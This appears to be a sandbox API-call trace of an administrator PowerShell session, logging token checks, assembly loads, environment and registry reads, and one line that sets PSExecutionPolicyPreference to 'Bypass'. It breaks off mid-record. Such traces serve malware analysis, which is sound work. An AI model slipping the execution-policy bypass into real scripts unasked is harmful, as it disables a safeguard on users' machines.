[0102.000] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.000] CoTaskMemFree (pv=0x1b7400b0) [0102.019] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0102.022] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ad6b0 | out: lpConsoleScreenBufferInfo=0x1ad6b0) returned 1 [0102.029] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0102.030] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ad6b0 | out: lpConsoleScreenBufferInfo=0x1ad6b0) returned 1 [0102.031] GetVersionExW (in: lpVersionInformation=0x1ad640*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad640*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0102.034] GetCurrentProcess () returned 0xffffffffffffffff [0102.035] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ad6d8 | out: TokenHandle=0x1ad6d8*=0x320) returned 1 [0102.040] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad5f8 | out: TokenInformation=0x0, ReturnLength=0x1ad5f8) returned 0 [0102.042] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x23aa60 [0102.042] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x23aa60, TokenInformationLength=0x4, ReturnLength=0x1ad5f8 | out: TokenInformation=0x23aa60, ReturnLength=0x1ad5f8) returned 1 [0102.044] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ad758 | out: phNewToken=0x1ad758*=0x31c) returned 1 [0102.044] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad5f8 | out: TokenInformation=0x0, ReturnLength=0x1ad5f8) returned 0 [0102.044] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x23aa90 [0102.044] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x23aa90, TokenInformationLength=0x4, ReturnLength=0x1ad5f8 | out: TokenInformation=0x23aa90, ReturnLength=0x1ad5f8) returned 1 [0102.045] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2cc2120*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ad768 | out: IsMember=0x1ad768) returned 1 [0102.045] CloseHandle (hObject=0x31c) returned 1 [0102.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.157] CoTaskMemAlloc (cb=0x804) returned 0x1b74e2f0 [0102.157] GetConsoleTitleW (in: lpConsoleTitle=0x1b74e2f0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0102.157] CoTaskMemFree (pv=0x1b74e2f0) [0102.264] CoTaskMemAlloc (cb=0x804) returned 0x1b74eba0 [0102.264] GetConsoleTitleW (in: lpConsoleTitle=0x1b74eba0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0102.264] CoTaskMemFree (pv=0x1b74eba0) [0102.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.268] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0102.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0102.400] SetConsoleCtrlHandler (HandlerRoutine=0x28268dc, Add=1) returned 1 [0102.403] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.403] CoTaskMemFree (pv=0x1b7400b0) [0102.406] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1 [0102.421] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324 [0102.424] CoCreateGuid (in: pguid=0x1ad850 | out: pguid=0x1ad850*(Data1=0xdd3f4303, Data2=0x3e64, Data3=0x4318, Data4=([0]=0x91, [1]=0x9a, [2]=0x4f, [3]=0x98, [4]=0x2d, [5]=0xbd, [6]=0x98, [7]=0x74))) returned 0x0 [0102.426] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.426] CoTaskMemFree (pv=0x1b7400b0) [0102.452] WinSqmIsOptedIn () returned 0x0 [0102.453] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.453] CoTaskMemFree (pv=0x1b7400b0) [0102.456] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.456] CoTaskMemFree (pv=0x1b7400b0) [0102.456] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.457] CoTaskMemFree (pv=0x1b7400b0) [0102.458] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.458] CoTaskMemFree (pv=0x1b7400b0) [0102.458] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.459] CoTaskMemFree (pv=0x1b7400b0) [0102.463] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.463] CoTaskMemFree (pv=0x1b7400b0) [0102.464] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.464] CoTaskMemFree (pv=0x1b7400b0) [0102.464] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.464] CoTaskMemFree (pv=0x1b7400b0) [0102.467] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.468] CoTaskMemFree (pv=0x1b7400b0) [0102.480] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.480] CoTaskMemFree (pv=0x1b7400b0) [0102.481] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.481] CoTaskMemFree (pv=0x1b7400b0) [0102.482] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.482] CoTaskMemFree (pv=0x1b7400b0) [0102.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.761] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.761] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0102.761] CoTaskMemFree (pv=0x1b7400b0) [0102.763] CoTaskMemAlloc (cb=0xcc) returned 0x2e9d60 [0102.763] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e9d60, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0102.763] CoTaskMemFree (pv=0x2e9d60) [0102.763] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3c8 | out: phkResult=0x1ad3c8*=0x328) returned 0x0 [0102.763] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, 